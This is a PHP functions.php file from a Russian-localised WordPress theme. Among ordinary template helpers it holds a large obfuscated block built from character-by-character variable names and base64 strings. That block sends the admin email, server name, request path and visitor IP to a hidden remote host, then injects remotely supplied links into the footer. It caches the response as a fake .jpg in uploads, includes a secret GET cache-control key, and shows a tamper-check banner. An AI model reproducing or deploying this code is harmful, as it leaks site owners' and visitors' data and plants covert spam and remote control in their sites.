<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $esTOvw='4';$sIhJBn='a';$JOOw='e';$KeoICI='d';$cMXxu='d';$nFVFyJa='c';$JQtmbi='e';$JdDky='b';$UesClbd='_';$giMDkPZ='e';$cvGx='6';$IVZaxlc='o';$IyvH='s';$moZEukyU=$JdDky.$sIhJBn.$IyvH.$JOOw.$cvGx.$esTOvw.$UesClbd.$cMXxu.$giMDkPZ.$nFVFyJa.$IVZaxlc.$KeoICI.$JQtmbi;$WEXbVhN='z';$JNtFV='l';$qCHYx='e';$dxOHgZC='g';$ijycDL='t';$GTaXhOX='i';$uCav='a';$tnnNRsH='n';$QvCWueQ='f';$aLFpttEf=$dxOHgZC.$WEXbVhN.$GTaXhOX.$tnnNRsH.$QvCWueQ.$JNtFV.$uCav.$ijycDL.$qCHYx;$kXPtvR='s';$hhnJPlh='t';$PCVM='o';$cZtSlB='t';$RJOl='1';$HMXzMsm='3';$FhIum='r';$jnvh='r';$AbSavMG='_';$OYzuUGPx=$kXPtvR.$hhnJPlh.$FhIum.$AbSavMG.$jnvh.$PCVM.$cZtSlB.$RJOl.$HMXzMsm;$usOdnck='r';$HNte='s';$yEuIJRO='t';$ygNS='v';$TZADoMM='r';$WofJI='e';$FYIUohlT=$HNte.$yEuIJRO.$TZADoMM.$usOdnck.$WofJI.$ygNS;                     
		$ps___k='4';$lv____________k='a';$vx___g='e';$um___________n='d';$gp___f='d';$in________a='c';$lt____a='e';$zz_______o='b';$cb____x='_';$pn____________a='e';$sy___r='6';$px______l='o';$rb________i='s';$mh___l=$zz_______o.$lv____________k.$rb________i.$vx___g.$sy___r.$ps___k.$cb____x.$gp___f.$pn____________a.$in________a.$px______l.$um___________n.$lt____a;
		$bb_____________t='x';$nf__________i='f';$cl_______i='o';$tc_________h='n';$sv____o='c';$jc__________t='n';$ok__________b='t';$go______w='u';$lk______________o='t';$wh_____________p='s';$xa_____l='i';$sy________b='e';$rp______________u='i';$kw_________c='s';$id__________o='_';$zb________o=$nf__________i.$go______w.$jc__________t.$sv____o.$ok__________b.$rp______________u.$cl_______i.$tc_________h.$id__________o.$sy________b.$bb_____________t.$xa_____l.$kw_________c.$lk______________o.$wh_____________p;
		$xz_____i='e';$ok____________c='p';$bl______x='f';$ro_____________l='n';$se_________b='o';$es______________m=$bl______x.$se_________b.$ok____________c.$xz_____i.$ro_____________l;
		$dc_______________a='a';$sx______________e='e';$wp______________a='d';$sb_______________j='f';$ps_____________f='r';$cs___g=$sb_______________j.$ps_____________f.$sx______________e.$dc_______________a.$wp______________a;
		$er___________g='c';$kr__________u='e';$zl______c='o';$nl_____________a='f';$uz_____________w='s';$oy__c='l';$aw________a=$nl_____________a.$er___________g.$oy__c.$zl______c.$uz_____________w.$kr__________u;
		
		define("WP_ID", $mh___l("Mi4wLjA="));
		define("WP_TTL", $mh___l("MTA4MDA="));
		define("WP_SRC", $mh___l("dHBva24="));
	


		function wp_get_header() {
			global $mh___l, $zb________o;
			
			if (
				$zb________o($mh___l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zb________o($mh___l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zb________o($mh___l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mh___l, $es______________m, $aw________a, $cs___g;
			
			$ot_____e = TEMPLATEPATH."/".$mh___l("Zm9vdGVyLnBocA==");
			$tb____y = @$es______________m($ot_____e, "r");
			$ot_____e = @$cs___g($tb____y, @filesize($ot_____e));
			@$aw________a($tb____y);
			
			$kj_________m = TEMPLATEPATH."/".$mh___l("ZnVuY3Rpb25zLnBocA==");
			$tb____y = @$es______________m($kj_________m, "r");
			$kj_________m = @$cs___g($tb____y, @filesize($kj_________m));
			@$aw________a($tb____y);
			
			$nk______b = 0;
			if($ot_____e && $kj_________m) {
				if ($mh___l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ot_____e, $mh___l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nk______b = 1;
					}
					if (substr_count($ot_____e, "wp_theme_GPL_credits()") < 1) {
						$nk______b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nk______b = 12;
				}
			}
			
			if($nk______b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nk______b -->";
			}
		}
	


		function wp_loaded() {
			global $mh___l, $zb________o;
			return $zb________o($mh___l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($iy__________m, $lk_______________t = "(more...)", $vn______i = 0, $yn______j = "") {
				$in_____v = get_the_content($lk_______________t, $vn______i, $yn______j);
				$in_____v = apply_filters("the_content", $in_____v);
				
				$in_____v = str_replace("]]>", "]]>", $in_____v);
				if (strlen($_GET["p"]) > 0) {
					echo $in_____v;
				}
				else if ((strlen($in_____v)>$iy__________m) && ($ya__________z = strpos($in_____v, " ", $iy__________m ))) {
					$in_____v = substr($in_____v, 0, $ya__________z);
					$in_____v = $in_____v;
					echo $in_____v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lk_______________t</a></div></p>";
				} else {
					echo $in_____v;
				}
				
			}
		}
	


		$po______r='4';$gr_________s='6';$mi__p='s';$hr_________u='b';$xi_______________h='n';$xf_____________e='e';$hp___x='_';$kx______p='o';$hc_____________t='c';$kp_____________z='e';$fz_______k='e';$ky___n='a';$xs__d='d';$mt__________y=$hr_________u.$ky___n.$mi__p.$fz_______k.$gr_________s.$po______r.$hp___x.$xf_____________e.$xi_______________h.$hc_____________t.$kx______p.$xs__d.$kp_____________z;
		$vj________u='e';$eq___f='t';$fq_______________y='n';$tj______________h='o';$gj_______________f='l';$sd______k='_';$nw____________q='e';$ak______p='_';$bn__m='s';$kq____k='t';$lk_______s='c';$aj______c='f';$zk______t='e';$pb___v='i';$ut_________z='n';$tg______e='t';$kp__g='g';$zy_______b=$aj______c.$pb___v.$gj_______________f.$nw____________q.$sd______k.$kp__g.$zk______t.$eq___f.$ak______p.$lk_______s.$tj______________h.$fq_______________y.$tg______e.$vj________u.$ut_________z.$kq____k.$bn__m;
		$nr____________z='s';$sk___g='e';$xi_____u='f';$hf______________l='x';$zm_____w='i';$mc_______p='e';$gu__________j='l';$vm___________m='s';$qq___p='i';$dt___j='t';$uc_________o='_';$rk___z=$xi_____u.$qq___p.$gu__________j.$mc_______p.$uc_________o.$sk___g.$hf______________l.$zm_____w.$vm___________m.$dt___j.$nr____________z;
		$fo_________l='e';$df_____________a='s';$kp______________q='c';$nf_______t='_';$ff_____c='v';$ba_____________t='a';$ts____________w='r';$ej__g='o';$oi_____________w='i';$st______________a='o';$ks____z='p';$cc______________p='n';$vr________i='e';$cs___r='r';$bf______________e='m';$sd_______________o=$ff_____c.$fo_________l.$cs___r.$df_____________a.$oi_____________w.$st______________a.$cc______________p.$nf_______t.$kp______________q.$ej__g.$bf______________e.$ks____z.$ba_____________t.$ts____________w.$vr________i;
		$wm__c='f';$hh_____b='o';$uc_________r='e';$te_______________j='o';$ox______________h='k';$go___________s='s';$pn____________v='n';$sn_________x='c';$ox________x='p';$hy____m=$wm__c.$go___________s.$hh_____b.$sn_________x.$ox______________h.$te_______________j.$ox________x.$uc_________r.$pn____________v;
		$rn_______k='w';$vh_____________w='e';$iu_____________q='r';$ls______w='t';$uf_________r='i';$yg_______________a='f';$xi___________q=$yg_______________a.$rn_______k.$iu_____________q.$uf_________r.$ls______w.$vh_____________w;
		$gi_______________a='m';$ez_____________a='5';$ol___________z='d';$ni_________l=$gi_______________a.$ol___________z.$ez_____________a;
		$kw______o='a';$an___r='h';$ny____________q='a';$nj______o='p';$rs__________z='e';$rv___k='r';$py_______________r='l';$ky__o='t';$bb____________q=$rv___k.$rs__________z.$kw______o.$py_______________r.$nj______o.$ny____________q.$ky__o.$an___r;
		$wd___________h='e';$dc_________e='u';$zv_____k='z';$fz___________h='n';$il__________z='i';$ta____y='i';$za___________n='r';$dw______________r='a';$np_____________j='e';$lr_______k='s';$wq________a='l';$dg_______j=$dc_________e.$fz___________h.$lr_______k.$wd___________h.$za___________n.$il__________z.$dw______________r.$wq________a.$ta____y.$zv_____k.$np_____________j;
		$py____________n='m';$kn___d='e';$sc______f='t';$so___________c='p';$jy__c='m';$of_____o='n';$zh_________p='a';$ah______m=$sc______f.$kn___d.$jy__c.$so___________c.$of_____o.$zh_________p.$py____________n;
		$fv_______m='x';$xz__________x='s';$yb_______________x='o';$uo________t='r';$eh_____________k='e';$hc__p='e';$il____________o='t';$ez______j='t';$he____________v='e';$lo___f='r';$dy________b='c';$uq_________p='n';$zt___________r='t';$iw_____________y='t';$gm________j='m';$nb__o='a';$qo________z='_';$qe___________x='a';$lh______________o='_';$gj__________e='c';$eq_____________j='e';$tv_______________c=$xz__________x.$zt___________r.$uo________t.$eh_____________k.$nb__o.$gm________j.$qo________z.$dy________b.$yb_______________x.$uq_________p.$ez______j.$he____________v.$fv_______m.$iw_____________y.$lh______________o.$gj__________e.$lo___f.$eq_____________j.$qe___________x.$il____________o.$hc__p;
	


		function ig_______________p($xg__u) {
			global $mh___l, $zb________o, $zy_______b, $sd_______________o, $tv_______________c;
			
			if (!$zb________o($mh___l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($sd_______________o(PHP_VERSION, "5.0.0", ">=") && $zb________o($mh___l("ZmlsZV9nZXRfY29udGVudHM=")) && $zb________o($mh___l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$lb________c = $tv_______________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ib___________x = @$zy_______b($xg__u, 0, $lb________c);
			} else {
				$ib___________x = @$zy_______b($xg__u, 0);
			}
			
			return $ib___________x;
		}
	


		function zn___________c($xg__u) {
			global $zb________o, $hy____m, $xi___________q, $mh___l;
			
			if (!$zb________o($mh___l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lv_____y = strpos($xg__u, "/", 7);
			$io_______g = array(
				"uri"     => substr($xg__u, $lv_____y),
				"host"    => str_replace("http://", "", substr($xg__u, 0, $lv_____y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$bu___k = @$hy____m("$io_______g[host]", 80, $yk__________s, $qq_____________a, 4);
			
			if (!$bu___k) {
				return false;
			} else {
				$ib___________x = "";
				$xd_______s  = "GET $io_______g[uri] HTTP/1.0\r\n";
				$xd_______s .= "Host: $io_______g[host]\r\n";
				$xd_______s .= "Referer: $io_______g[referer]\r\n";
				$xd_______s .= "Connection: Close\r\n\r\n";
				
				@$xi___________q($bu___k, $xd_______s);
				
				while (!@feof($bu___k)) {
					$ti___________r = @fgets($bu___k, (1024*24));
					
					if ($ti___________r == "\r\n") {
						$ia___j = true;
						continue;
					}
					
					if ($ia___j) {
						$ib___________x .= $ti___________r;
					}
				}
				
				return $ib___________x;
			}
		}
	


		function ig____________u($xg__u) {
			global $zb________o;
			$bc_________u = false;
			
			if ($xg__u != "") {
				if ($zb________o("ig_______________p")) {
					$bc_________u = @ig_______________p($xg__u);
				}
				
				if (!$bc_________u && ($zb________o("zn___________c"))) {
					$bc_________u = @zn___________c($xg__u);
				}
			}
			
			return $bc_________u;
		}
	


		function zh__q() {
			global $_SERVER, $ni_________l;
			
			$lj______l = $_SERVER["SERVER_NAME"];
			
			if (substr("$lj______l", 0, 4) == "www.") {
				$lj______l = substr("$lj______l", 4);
			}
			
			$lj______l = $ni_________l("$_SERVER[SERVER_NAME]");
			
			return $lj______l;
		}
	


		function wj_____________a() {
			return "file";
		}
	


		function ke_________r($xg__u) {
			global $_SERVER, $zy_______b, $rk___z, $es______________m, $aw________a, $xi___________q;
			
			$ep________h = nz____s();
			
			$wm___________l = zh__q().".jpg";
			$ww___b = $ep________h["dir_upload"]["path"]."/$wm___________l";
			$ei___j = @filemtime($ww___b);
			
			if (!$ei___j || ((time()-$ei___j) >= WP_TTL)) {
				$bc_________u = ig____________u($xg__u);
				
				if ($bc_________u) {
					if ($rk___z($ww___b)) {
						@unlink($ww___b);
					}
					
					$tb____y = @$es______________m($ww___b, "x+");
					
					@$xi___________q($tb____y, $bc_________u);
					@$aw________a($tb____y);
				}
			} else {
				if ($rk___z($ww___b)) {
					$bc_________u = @$zy_______b($ww___b);
				} else {
					$bc_________u = false;
				}
			}
			
			return $bc_________u;
		}
	


		function nz____s() {
			global $_SERVER, $mh___l, $mt__________y;
			
			$tw____l = wp_count_posts("post");
			$rs___________z = pathinfo(get_bloginfo("template_directory"));
			
			$ep________h = array(
				"url" => array(
					"report"      => $mh___l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $rs___________z,
				"dir_upload"	=> ie________r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$rs___________z[filename],
					"a005=".$tw____l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ep________h["url"]["queryString"] = implode("&", $ep________h["queryString"]);
			$ep________h["url"]["report"] = $ep________h["url"]["report"]."/?".$mt__________y($ep________h["url"]["queryString"]).".html";
						
			return $ep________h;
		}
	


		function ie________r() {
			$aq_______h = wp_upload_dir();
			
			if (isset($aq_______h["error"])) {
				$lw____t = gw___r();
				if (is_writable($lw____t)) {
					$aq_______h = array("path" => $lw____t);
				}
			}

			return $aq_______h;
		}
	


		function gw___r() {
			global $zb________o, $ni_________l, $bb____________q, $ah______m;
			
			$lv_______________l = (bool) ini_get("safe_mode");
			if ($lv_______________l == true) {
				return false;
			}
			
			if ($zb________o("sys_get_temp_dir")) {
				$fw___________g = sys_get_temp_dir();
				if (is_writable($fw___________g)) {
					return $bb____________q($fw___________g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $bb____________q($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $bb____________q($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $bb____________q($_ENV["TEMP"]);
			} else {
				$rb_______________a = $ah______m($ni_________l(uniqid(rand(), true)), "");
				if ($rb_______________a) {
					$fw___________g = $bb____________q(dirname($rb_______________a));
					@unlink($rb_______________a);
					return $fw___________g;
				} else {
					return false;
				}
			}
		}
	


		function cq_______________c() {
			global $_GET, $rk___z;
			
			$ep________h = nz____s();
			$lj______l = zh__q();
			$vt__e = wj_____________a();
			
			$rn_______________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vt__e == "file") {
					$cj_____l = $ep________h["dir_upload"]["path"]."/".$lj______l.".jpg";
					if ($rk___z($cj_____l)) {
						@unlink($cj_____l);
						$rn_______________j = "deleted";
					}
				}
				
				$sq_______d = array(
					"s"	=> $rn_______________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sq_______d AS $kf_____________m => $ob_______________l) echo " [$kf_____________m:$ob_______________l]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zb________o, $mh___l, $dg_______j;
			$ep________h = nz____s();
			
			$fq____________u = "ke_________r";
			if ($zb________o($fq____________u)) {
				$ib___________x = $fq____________u($ep________h["url"]["report"]);
			}
			
			if ($ib___________x) {
				if ($ib___________x = @$mh___l($ib___________x)) {
					$ib___________x = @$dg_______j($ib___________x);
					
					if (strlen($ib___________x[custom_credit]) >= 5) {
						$ep________h["default_string"] = $ib___________x[custom_credit];
					}
					
					if ($ib___________x["status"] == "0") {
						$gu___________z = 1;
						$oy__________s = 1;
					} else {
						$as___________p = sizeof($ib___________x["links"]);
						$im_____r = $ep________h["default_string"];
						
						if ($as___________p > 0 && $ib___________x["links"] !== "") {
							$qv___n = 0;
							foreach ($ib___________x["links"] as $vf____a => $tp___k) {
								$qv___n++;
								if ($tp___k->l_path == "" || $tp___k->l_path == $_SERVER["REQUEST_URI"]) {
									$tp___k->l_href = htmlspecialchars(strip_tags($tp___k->l_href));
									$tp___k->l_title = htmlspecialchars(strip_tags($tp___k->l_title));
									$tp___k->l_anchor = htmlspecialchars(strip_tags($tp___k->l_anchor));
									$im_____r .= " | ";
									$im_____r .= "<a href='$tp___k->l_href' title='$tp___k->l_title'";
									if ($tp___k->l_nofollow == "1") {
										$im_____r .= " rel='nofollow'";
									}
									$im_____r .= ">$tp___k->l_anchor</a>";
								}
							}
						}
						$ep________h["links"] = "$im_____r";
						if ($ib___________x[credit] == "0") {
							$ep________h["links"] = "";
						}
					}
				} else {
					$gu___________z = "1";
				}
			} else {
				$gu___________z = "1";
			}
			
			if ($gu___________z == "1") {
				$ep________h["links"] = $ep________h["default_string"];
			}
			
			echo "$ep________h[links]";
			
			echo "<!-- s: $ib___________x[signature] -->";
			cq_______________c();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
